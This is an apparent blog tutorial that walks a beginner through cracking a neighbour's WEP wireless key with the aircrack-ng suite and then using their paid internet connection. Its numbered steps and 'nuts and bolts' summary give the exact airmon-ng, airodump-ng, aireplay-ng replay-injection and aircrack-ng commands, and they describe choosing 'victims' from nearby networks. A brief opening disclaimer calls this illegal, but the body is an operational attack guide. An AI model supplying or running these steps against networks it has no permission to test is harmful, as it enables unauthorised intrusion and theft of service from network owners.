So you have your WEP wireless. You could have been advised to use WPA or WPA2 (topics for later discussion). I am not going to invite a debate at this juncture about the opportunities available to a would be hacker should he/she gain access to your router. For this exercise the objective is simply to crack your WEP passphrase, then gain free access to the internet through your paid connection. Now this is illegal and should only be practiced through your own registered connection. This tutorial is for information purposes only. I hope you read, read and re-read with an understanding as to why you should re-visit your home / workplace wireless security configuration, hopefully preventing yourself from becoming compromised and a victim of crime. With your home / office wireless compromised you are open to attacks that could include not just theft of your assets but also your identity.

Hacking Wireless Internet for Dummies

By using the word ‘Dummies’ I am not being condescending to any of my readers here, it’s a term I have chosen to use following the various seminars I have taught, where certain individuals felt their lack of experience with Linux gave them a disadvantage. If you really are a Dummy, relax, it’s easy. No Linux knowledge needed, just follow these instructions.

Linux is friendlier than MS anyway. Linux people are always there to help :)

Boot into Linux

  • We need a PC or Notebook with a DVD drive and at least one USB port (should you require an external USB wireless adaptor).
  • We do need a specific wireless adaptor (explained in detail later), preferably chosen from this list. We at Dirty use the TP-Link TL-WN510G, which does the job perfectly.
  • We are going to use what is generally referred to as a ‘Live Distribution DVD’. This is a complete Linux Operating System that is built to run entirely from a CD / DVD without even touching your PC’s local hard drive (great eh). We will be using the FRHACK version of Backtrack 4 pre-release (Ubuntu Matrix style) which is proper fully loaded with all the latest hacking tools. Download a version of Backtrack 4 using this link Backtrack4-FRHACK .
  • Once downloaded burn the ISO to a DVD using your favorite ISO burning software, or download for free InfraRecorder (recommended to us by Google’s Matt Cutts, and it actually works).
  • Ensure your PC is configured to boot from CD / DVD. Insert the Backtrack DVD and kick start your pc. If all goes well you should hear the DVD spin and the Backtrack Live DVD start to boot up. After a few seconds you will be faced with a command prompt. Type startx[Enter].

Start Cracking Wireless (the fun part)

Scared (for the Dummies) of the command shell (black screen)? Don’t be. These instructions will be numbered and concise. There are many ways to skin this cat, but I am going to show you the easy way. I will not explicate the directions given within this tutorial, but just provide the necessary instruction for you to be able to hack WEP.

All Hex numbers used for MAC addresses in this example are for demo purposes only. Read the instructions and replace them with your actual results.

Let’s start the black screen.

  1. Microsoft calls them quick launch, call them what you like, bottom left hand corner of the screen, button looks like a black box [Left Click]. If not available navigate the menu to the Konsole shortcut.
  2. Konsole or command shell opens with the dreaded black screen.

    3. Attack preparation.

  3. In the konsole screen type airmon-ng wlan0 start [Enter]
  4. You will then receive a response that should give you an interface that is monitor enabled. This is usually mon0. We are now able to inject wireless packets into other people’s wireless gear (scary stuff).
  5. Note the monitor mode enabled interface if it’s not mon0
  6. If wlan0 (that is a zero) can’t be found type ifconfig and ensure you have a wireless adaptor attached.

    7. Hunt for victims

  7. In the konsole screen now type airodump-ng mon0
  8. This will display in a split screen all the routers and PC’s within range of your wireless adaptor that are online. The top half displays routers / gateways or access points (we will call them routers – not correct but we don’t want to complicate things here). BSSID is the unique MAC / hardware address of each router. The second half of the screen displays both BSSID and the Station (PC) MAC address. How stupid is wireless?
  9. We are only interested for this exercise in any BSSIDs and Stations in the bottom half of the screen that are associated. This is where it displays both a MAC address for the BSSID and the Station. Pick your target, check that the BSSID of the associated pair is using WEP and then let the hacking begin.

    10. Our victim’s data

  10. We need to collect a number of IV or ARP packets of data between our chosen victim and Station/PC.Normally this would take hours if not days. This is where our special wireless card comes into place. Whilst implementing the above steps you would have noticed a column header named #Data. This is what we need to collect (IV). You may have seen some routers send 10 or 20 packets of data during your brief observation.
  11. We need 10,000 or more. How do we do this? Well strangely enough with our golden wireless adaptor, we are able to inject packets into the victim’s wireless technology fooling it into believing it needs to re- authentication. Each re-authentication request contains an encrypted packet with their WEP key. We collect enough of these and we can calculate the key.

    12. Attack our victim

  12. Make a note of your victims BSSID and the associated Station (host).
  13. In the konsole screen type controlZ (control key that is + z)
  14. This will hide the previous airodump-ng session.
  15. Type airodump-ng mon0 –c 6 –w wep
    1. airodump-ng= software we use from the command line to record data packets
    2. mon0=wireless adaptor
    3. -c 6= the channel your victims wireless uses (6).
    4. –w wep lets airodump-ng know what it should name all the files containing collected broadcasted data. You may name and store these files anywhere. They will be needed at a later point.
  16. Again we are only interested in associated BSSID and Stations as per step 9.So we are collecting data very slowly that may enable us to hack their WEP in a week or so. How do we inject them to expedite our business?
  17. Whilst you are collecting data lets open another Konsole screen. Do not close the first.
  18. Type aireplay-ng  -b 1A:2A:3A:4A:5A:6A –h 10:20:30:40:50:60 mon0 -3
  19. The hex numbers after –b and –h are for demonstration purposes only and represent the MAC addresses collected in step 9 and should be replaced by those previously recorded.
    1. –b= BSSID of victim
    2. –h= Station or host of associated victim
    3. Mon0=wireless adaptor
    4. -3= attack mode we are going to use
  20. With aireplay-ng running our victim should be sending access request packets at a rate faster than Camilla’s handshake. However it may take a couple of minutes to start. We can force this, but that’s another lesson.

    21. Now for the cracking part

  21. Open another konsole window. Do not close the others. We should have three now.
  22. Type aircrack-ng –b 1A:2A:3A:4A:5A:6A wep-01.cap
    1. aircrack-ng=software we use from the command line
    2. –b=BSSID of victim
    3. Wep-01.cap= Step 15 gave the name of the file to be used for data collection. Well this is the file we use to calculate the WEP passphrase and is always a .cap file. Note… This file will continue to grow whilst airodump-ng is running as per step 15.
  23. aircrack-ng will attempt to crack the passphrase with the given amount of IVs collected within the data collection file set in step 15 and discussed above.
  24. Should aircrack-ng fail to un-encrypted a passphrase, it will automatically continue as long as airodump-ng is running, usually at 5,000 IV intervals. We have had some passphrases that required 50,000 IV’s. But they were only government agencies.

Nuts and bolts:

  • Download, burn and run backtrack4 or similar distro with aircrack suite of tools
  • startx [enter] if you need the GUI
  • Open konsole or command shell window
  • airmon-ng start wlan0 (your card may not be wlan0 please check with ifconfig)
  • airodump-ng mon0 to find victim
  • airodump-ng mon0 –c 6 –w wep (6 being your victims channel (it could be anything, look and see)and wep being your file nomenclature)
  • Open another konsole or command shell window
  • aireplay-ng - b 1A:2A:3A:4A:5A:6A –h 10:20:30:40:50:60 mon0 -3 (-b for BSSID, -h for host or Station(HEX numbers following –b and –h above should be replaced with your own victim’s router and hosts MAC address) , mon0 is the wireless adaptor and -3 is our method of attack)
  • Once we have started collecting some IV’s or Data packets we need to start cracking
  • aircrack-ng - b 1A:2A:3A:4A:5A:6A wep-01.cap (-b for BSSID (again replace the HEX with your own victims MAC address)  and wep-01.cap is the capture file you set previously in step 20)
  • aircrack-ng will continue to try to crack the WEP passphrase whilst you collect packets using airodump-ng and aireplay-ng.
  • airodump-ng –help
  • aireplay-ng –help
  • aircrack-ng –help

If you are brave go to the aircrack website (we cannot link to them for legal reasons - dubdubdub.aircrack-ng.org) and check out wesside-ng. We will be doing a tutorial on wesside-ng in 4 weeks.
Next up will be how to crack WPA TKIP in 2 minutes without using brute or a wizard’s wordlist.

Older Entries